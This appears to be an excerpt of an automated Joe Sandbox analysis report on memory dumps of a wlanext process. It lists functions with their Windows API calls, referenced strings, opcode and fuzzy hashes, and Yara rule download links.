                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: _wcspbrk
                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                • API String ID: 402402107-258546922
                                                                                • Opcode ID: 1cde816ef8367a085f60eabf3ecdcb7f1e86840aef2a73ae5e96df43d07b1a8f
                                                                                • Instruction ID: da0d3a3f1fc5201e1904a41fee55e0822f359ca3ec1373916fd753fa7d392bde
                                                                                • Opcode Fuzzy Hash: 1cde816ef8367a085f60eabf3ecdcb7f1e86840aef2a73ae5e96df43d07b1a8f
                                                                                • Instruction Fuzzy Hash: C7F1C6B2D00309EFDB51DF95C9849EEB7B9FF08304F14846AE905A7610E735AA45EF60
                                                                                Function 020813CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ___swprintf_l
                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                • API String ID: 48624451-2108815105
                                                                                • Opcode ID: 2302a776cfa875f60a97acf58f09c1fc482d30feabbf876194b6336edf034918
                                                                                • Instruction ID: d0e23ba202e3dc673c4378a8523f77fc044dc1356db92061a053bf5aa296d967
                                                                                • Opcode Fuzzy Hash: 2302a776cfa875f60a97acf58f09c1fc482d30feabbf876194b6336edf034918
                                                                                • Instruction Fuzzy Hash: 7D6101B1D00755AADF25EF99C8909BFBBF6EF84300B54C03DE4DA4A640D734A642EB60
                                                                                Function 00C0B518 Relevance: 15.2, APIs: 10, Instructions: 176COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTokenInformation.ADVAPI32(00C0B169,00000001(TokenIntegrityLevel),00000000,00000000,00C0B169,00C01D14,00C12000,00C12000,00C0B169,?,?,00C0B169), ref: 00C0B56E
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B576
                                                                                • GetTokenInformation.ADVAPI32(00C0B169,00000001(TokenIntegrityLevel),?,00C0B169,00C0B169,00C0B169,?,?,?,00C0B169), ref: 00C0B5EB
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B5F1
                                                                                • IsValidSid.ADVAPI32(?,?,?,00C0B169), ref: 00C0B61E
                                                                                • GetLengthSid.ADVAPI32(?,?,?,00C0B169), ref: 00C0B662
                                                                                • CopySid.ADVAPI32(00C0B169,?,?,00000000,?,?,?,00C0B169), ref: 00C0B687
                                                                                • GetLastError.KERNEL32(?,?,00C0B169), ref: 00C0B691
                                                                                • ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00C0B6BB
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • LocalFree.KERNEL32(00000000,00C0B169), ref: 00C0B6FF
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$InformationToken$ConvertCopyFreeLengthLocalMessageStringTraceValid
                                                                                • String ID:
                                                                                • API String ID: 1907644683-0
                                                                                • Opcode ID: ec65c5679a75cb66afc55f6084384703f8b32b86564932fc4edeae1042375b6d
                                                                                • Instruction ID: 5799265ac8d3849b5e91a7602dad49b4d8a34aaedcadf728830683f0513a0353
                                                                                • Opcode Fuzzy Hash: ec65c5679a75cb66afc55f6084384703f8b32b86564932fc4edeae1042375b6d
                                                                                • Instruction Fuzzy Hash: 1C61283191021AAFDB1ADF95CD48FADBBB6BB05704F244095F510A61E2D7B2CE90EB50
                                                                                Function 02077EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02093F12
                                                                                Strings
                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02093EC4
                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0209E2FB
                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02093F4A
                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02093F75
                                                                                • Execute=1, xrefs: 02093F5E
                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0209E345
                                                                                • ExecuteOptions, xrefs: 02093F04
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: BaseDataModuleQuery
                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                • API String ID: 3901378454-484625025
                                                                                • Opcode ID: eb8c61ef1bc60293bfec6a23d1131044cf08aeed4122f74fd2c4ffebb62e69b3
                                                                                • Instruction ID: d896cb5eaaa430a3b24c5156a7e6db9a456b4a38ea9601b5483d4c3110f386e1
                                                                                • Opcode Fuzzy Hash: eb8c61ef1bc60293bfec6a23d1131044cf08aeed4122f74fd2c4ffebb62e69b3
                                                                                • Instruction Fuzzy Hash: E141C671A8031C7AEF21DA94DCC9FEEB3BDAF14704F0045A9F506E6090EB709A45AF65
                                                                                Function 00C0A997 Relevance: 13.7, APIs: 9, Instructions: 163timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600,00C01680,00000000,00C120B0), ref: 00C0A9D9
                                                                                • LeaveCriticalSection.KERNEL32(00C12600), ref: 00C0AA10
                                                                                • LeaveCriticalSection.KERNEL32(00C12600), ref: 00C0AA92
                                                                                • ChangeTimerQueueTimer.KERNEL32(00000005,?,7FFFFFFF,00000000), ref: 00C0AAA6
                                                                                • GetLastError.KERNEL32 ref: 00C0AAB6
                                                                                • DeleteTimerQueueTimer.KERNEL32(00000005,?,000000FF), ref: 00C0AB1C
                                                                                • GetLastError.KERNEL32 ref: 00C0AB26
                                                                                • DeleteTimerQueueEx.KERNEL32(00000005,000000FF), ref: 00C0AB5A
                                                                                • GetLastError.KERNEL32 ref: 00C0AB68
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$CriticalErrorLastQueueSection$DeleteLeave$ChangeEnterMessageTrace
                                                                                • String ID:
                                                                                • API String ID: 2363892891-0
                                                                                • Opcode ID: 1c18ca4110f01c10507574629970061fcdd007971ee84ca501e3b1dc0dba4c6a
                                                                                • Instruction ID: 682710ae5e59b602ba5f05eca34452f6a8db84c445b42eef5ff7488a33f2e531
                                                                                • Opcode Fuzzy Hash: 1c18ca4110f01c10507574629970061fcdd007971ee84ca501e3b1dc0dba4c6a
                                                                                • Instruction Fuzzy Hash: 2C51B534640341AFEF1A9F60DD44BAD7FA6BB05708F244158F911661E2C771CA92EF52
                                                                                Function 02080B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: __fassign
                                                                                • String ID: .$:$:
                                                                                • API String ID: 3965848254-2308638275
                                                                                • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction ID: 67de3c3d8d1a02aaccdedbe8416d8a0de3e91dbac82d4f40e72628eeb15c3f83
                                                                                • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                • Instruction Fuzzy Hash: 26A1CD7190030AEEDF25EFA4C8547BFBBB6AF04308F24846AD992A7240D730964DEB51
                                                                                Function 00C03CB7 Relevance: 12.3, APIs: 8, Instructions: 330memorysynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C03CF3
                                                                                • GetLastError.KERNEL32 ref: 00C03CFD
                                                                                • GetSystemMetrics.USER32 ref: 00C03D37
                                                                                • _wtol.MSVCRT(?), ref: 00C03D7B
                                                                                • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C03D91
                                                                                • WaitForSingleObject.KERNEL32(0001D4C0), ref: 00C04009
                                                                                  • Part of subcall function 00C041B9: EnterCriticalSection.KERNEL32(00C12520,00C12000,00000000,00C01680,?,00C03EE6,00000000,00C120B0,00000002,00C120A0,00000001), ref: 00C04220
                                                                                  • Part of subcall function 00C041B9: LeaveCriticalSection.KERNEL32(00C12520,?,00C120E8,?,00C03EE6,00000000,00C120B0,00000002,00C120A0,00000001), ref: 00C04250
                                                                                • UuidCreate.RPCRT4(00C120C0), ref: 00C03F1B
                                                                                • GetLastError.KERNEL32 ref: 00C03DA0
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CreateCriticalErrorLastSection$EnterEventHeapInformationLeaveMessageMetricsObjectSingleSystemTraceUuidWait_wtol
                                                                                • String ID:
                                                                                • API String ID: 48018306-0
                                                                                • Opcode ID: 1357c147490f401c979dac551a58b5fc23ae8ae239638cfcaa68b25e74bf7764
                                                                                • Instruction ID: 651de9c2672ca08565e4de0ec4f9122a31cd51056d21d0ed10e72c42edf3caa6
                                                                                • Opcode Fuzzy Hash: 1357c147490f401c979dac551a58b5fc23ae8ae239638cfcaa68b25e74bf7764
                                                                                • Instruction Fuzzy Hash: 76B1F870A447D16EE72A8B559C48FAA7E9EAF06784F0942C4FD109B2F2C391CF90D784
                                                                                Function 00C03782 Relevance: 12.3, APIs: 8, Instructions: 329sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(00C120DC,00000001), ref: 00C037C2
                                                                                • Sleep.KERNEL32(?,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C0399C
                                                                                • Sleep.KERNEL32(?,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C03A1B
                                                                                • Sleep.KERNEL32(?,00C120B0,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C03AA0
                                                                                  • Part of subcall function 00C05D57: EnterCriticalSection.KERNEL32(00C12500,00C01680,00000000,00C12000,?,?,00C03B26,?,00C120B0,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C05D97
                                                                                  • Part of subcall function 00C05D57: LeaveCriticalSection.KERNEL32(00C12500,?,?,00C03B26,?,00C120B0,00C120A0,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C05E84
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C03B60
                                                                                • GetCurrentProcess.KERNEL32(000002C9), ref: 00C03BA8
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00C03BAF
                                                                                • ExitProcess.KERNEL32 ref: 00C03BB6
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                  • Part of subcall function 00C0428C: EnterCriticalSection.KERNEL32(00C12520,00C01680,00000000,00C120A0,?,?,00C03969,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C042CC
                                                                                  • Part of subcall function 00C0428C: LeaveCriticalSection.KERNEL32(00C12520,00C120E8,?,?,00C03969,00C120A0,00C120B0,00C120B0,00C120A0), ref: 00C0431D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$ProcessSleep$EnterLeave$CloseCurrentExchangeExitHandleInterlockedMessageTerminateTrace
                                                                                • String ID:
                                                                                • API String ID: 4276794945-0
                                                                                • Opcode ID: 2bd08f81cde2e990157969ef67495fb7c140de11ee29e940fd7e2783eb9a4629
                                                                                • Instruction ID: de1a499e20fbda9793fe6525586a0c95e43651728e135b1692c9a698232f074c
                                                                                • Opcode Fuzzy Hash: 2bd08f81cde2e990157969ef67495fb7c140de11ee29e940fd7e2783eb9a4629
                                                                                • Instruction Fuzzy Hash: EEC1F4706402C06BEB26CF55880CF9A7E9EEB06748F094698F9555F1E2C3A4CF90EB95
                                                                                Function 00C0A721 Relevance: 12.2, APIs: 8, Instructions: 173timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600,00C01680,00C12000,00000000,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A797
                                                                                • CreateTimerQueue.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A7D3
                                                                                • GetLastError.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A7E2
                                                                                • CreateTimerQueueTimer.KERNEL32(00C12490,00C0A599,7FFFFFFF,00000064,00000010,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A83F
                                                                                • GetLastError.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A84D
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • DeleteTimerQueueEx.KERNEL32(00000000,000000FF,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A897
                                                                                • GetLastError.KERNEL32(?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A8A1
                                                                                • LeaveCriticalSection.KERNEL32(00C12600,?,?,00C03E45,00C120B0,00000002,00C120A0,00000001), ref: 00C0A8E9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Timer$ErrorLastQueue$CreateCriticalSection$DeleteEnterLeaveMessageTrace
                                                                                • String ID:
                                                                                • API String ID: 1365609285-0
                                                                                • Opcode ID: 7b456b4c6b962de970b721667d498e166daef34564f580a841e3edef5dd0621b
                                                                                • Instruction ID: 1e75d047bbf98f7ef098fd176a3085055d7bcbc6d3c5184d394f2e725a6b22cc
                                                                                • Opcode Fuzzy Hash: 7b456b4c6b962de970b721667d498e166daef34564f580a841e3edef5dd0621b
                                                                                • Instruction Fuzzy Hash: 6561B434640301EFEB2A8F54DD48F8CBB62BB09B08F198265F510571F2C3B1CAA1EB46
                                                                                Function 00C065AD Relevance: 12.2, APIs: 8, Instructions: 152synchronizationthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12500,00C01680,00000000,00C12000), ref: 00C065F5
                                                                                • LeaveCriticalSection.KERNEL32(00C12500), ref: 00C06657
                                                                                • CreateThread.KERNEL32(00000000,00000000,00C06526,00000000,00000000,00000000), ref: 00C06675
                                                                                • GetLastError.KERNEL32 ref: 00C06688
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 00C066F4
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • GetLastError.KERNEL32 ref: 00C0670B
                                                                                • LeaveCriticalSection.KERNEL32(00C12500,?), ref: 00C06760
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C06770
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$ErrorLastLeave$CloseCreateEnterHandleMessageObjectSingleThreadTraceWait
                                                                                • String ID:
                                                                                • API String ID: 4034362199-0
                                                                                • Opcode ID: 26615db8b28ba4bce081b4fd5a56893edcd73f754aebde5c0955d3e3e2a3b831
                                                                                • Instruction ID: 7c8f33fe656c03dcf75c8ca5a11faa175485dc74d003e5414cda4d230c777f18
                                                                                • Opcode Fuzzy Hash: 26615db8b28ba4bce081b4fd5a56893edcd73f754aebde5c0955d3e3e2a3b831
                                                                                • Instruction Fuzzy Hash: 91519334900245EFEF158F68DD48BADBFB5BB09308F1580A9EA10A61E1C3B1CBA4DB54
                                                                                Function 02080554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020A2206
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                • API String ID: 885266447-4236105082
                                                                                • Opcode ID: 3daf2c5a1438dc2daab8ace32016168340fc878fc95337de205ef6ad0faabb95
                                                                                • Instruction ID: 97d207e1b2f552a6aeaec5e812119bf03d397467f9dcbdb5dbd85e1892a419f0
                                                                                • Opcode Fuzzy Hash: 3daf2c5a1438dc2daab8ace32016168340fc878fc95337de205ef6ad0faabb95
                                                                                • Instruction Fuzzy Hash: 495125717003116FEB55DB58CC90FA673EAAF94720F218279EC55DF285EA21EC41ABA0
                                                                                Function 00C0F229 Relevance: 9.2, APIs: 6, Instructions: 208sleepfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount64.KERNEL32(?,80000005,?,?), ref: 00C0F2B3
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                • GetTickCount64.KERNEL32(?,?), ref: 00C0F313
                                                                                • Sleep.KERNEL32(00000064), ref: 00C0F3CA
                                                                                • ReadFile.KERNEL32(?,?,?,00000000,?), ref: 00C0F46D
                                                                                • GetLastError.KERNEL32 ref: 00C0F47A
                                                                                • InterlockedIncrement.KERNEL32(00C124C4), ref: 00C0F4A0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: Count64Tick$ErrorFileIncrementInterlockedLastMessageReadSleepTrace
                                                                                • String ID:
                                                                                • API String ID: 1134999173-0
                                                                                • Opcode ID: 3aaef149edc13a1df97e6f7c113731a286d9e7e123f7ac78e20b8b2210a7ea4c
                                                                                • Instruction ID: d38dbb355a2eeba0511ac462f80aaa85439624ce5ee140a546d4b1f09df3e383
                                                                                • Opcode Fuzzy Hash: 3aaef149edc13a1df97e6f7c113731a286d9e7e123f7ac78e20b8b2210a7ea4c
                                                                                • Instruction Fuzzy Hash: 9A71B235500200ABEF399FA4C888BAE7B66FB18314F24457DF815969E2C3B4C9D3EB50
                                                                                Function 00C0A599 Relevance: 9.1, APIs: 6, Instructions: 100timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(00C12600), ref: 00C0A5A6
                                                                                • LeaveCriticalSection.KERNEL32(00C12600), ref: 00C0A5E5
                                                                                • QueueUserWorkItem.KERNEL32(Function_0000A4FA,00000000,00000010), ref: 00C0A615
                                                                                • ChangeTimerQueueTimer.KERNEL32(7FFFFFFF,00000064), ref: 00C0A658
                                                                                • GetLastError.KERNEL32 ref: 00C0A662
                                                                                • GetLastError.KERNEL32 ref: 00C0A6E4
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalErrorLastQueueSectionTimer$ChangeEnterItemLeaveUserWork
                                                                                • String ID:
                                                                                • API String ID: 2163494555-0
                                                                                • Opcode ID: 541b4380a6f06dc71e76e34f3d529d46a4f68eb1ca9593713d600e93fef1247b
                                                                                • Instruction ID: 37ec4d5d027b0e8b6349928ee42d3e576211b5c234ac9543eddef84d1768bdb8
                                                                                • Opcode Fuzzy Hash: 541b4380a6f06dc71e76e34f3d529d46a4f68eb1ca9593713d600e93fef1247b
                                                                                • Instruction Fuzzy Hash: DA31F434144300ABEB2ECF14DC48BA97B76FB06708F288119F910461F2C7B6C9A1EB52
                                                                                Function 00C0E3AA Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • memset.MSVCRT ref: 00C0E3BE
                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 00C0E3CB
                                                                                • InitializeCriticalSection.KERNEL32(?), ref: 00C0E413
                                                                                • CreateEventW.KERNEL32(0000000C,00000001,00000000,00000000), ref: 00C0E45F
                                                                                • GetLastError.KERNEL32 ref: 00C0E46F
                                                                                  • Part of subcall function 00C0E291: CloseHandle.KERNEL32(?), ref: 00C0E2A3
                                                                                  • Part of subcall function 00C0E291: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2B9
                                                                                  • Part of subcall function 00C0E291: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00C02A48,00C12000,?,00C0EEB4), ref: 00C0E2C6
                                                                                  • Part of subcall function 00C0E291: memset.MSVCRT ref: 00C0E2D1
                                                                                • SetEvent.KERNEL32(00000000), ref: 00C0E484
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$DeleteEventInitializememset$CloseCreateErrorHandleLast
                                                                                • String ID:
                                                                                • API String ID: 3741578413-0
                                                                                • Opcode ID: baba681496171051577fd7213bb74ed4e029d407d88ad560993a137cf36eab70
                                                                                • Instruction ID: dbe403e56e27ece1ddfebceb7c91c9127ee60ec49579e605010d147599b60b0f
                                                                                • Opcode Fuzzy Hash: baba681496171051577fd7213bb74ed4e029d407d88ad560993a137cf36eab70
                                                                                • Instruction Fuzzy Hash: 1F11BC75D40214FBDB009FE5C948B9EFFB8EF98710F21851AF901A7291D6B08A41EFA0
                                                                                Function 00C03431 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExW.ADVAPI32 ref: 00C03499
                                                                                • RegQueryValueExW.ADVAPI32(?,HandlerTimeout,00000000,?,?,00000004), ref: 00C034F2
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00C03564
                                                                                  • Part of subcall function 00C02CE5: TraceMessage.ADVAPI32(?,?,0000002B,?,?,00000000), ref: 00C02CFA
                                                                                Strings
